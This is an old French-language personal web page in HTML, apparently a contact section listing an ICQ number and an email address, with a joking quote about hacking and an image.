<p><font face="Courier New"><font color="#000000">Ou me joindre?</font></font>
<p><font face="Courier New">&nbsp;sur icq/mon uin : 19532403</font>
<p><font face="Courier New">ou m'ecrire un email &agrave; : <a href="stecollin@hotmail.com">stecollin@hotmail.com</a></font>
<br>&nbsp;
<p><b><i><font face="Courier New"><font color="#666666">&nbsp; "Si le hack
n'existait pas, je ne verrais pas l'avantage d'avoir le net."&nbsp;&nbsp;
;o)</font></font></i></b>
<br><b><i><font face="Courier New"><font color="#666666">&nbsp;</font></font></i></b>
<br><b><i><font face="Courier New"><font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font></font></i></b><img SRC="bigepee.gif" height=189 width=249>
<br>&nbsp;
<br>&nbsp;
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br><font color="#000099"><font size=+3></font></font>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
</body>
</html>
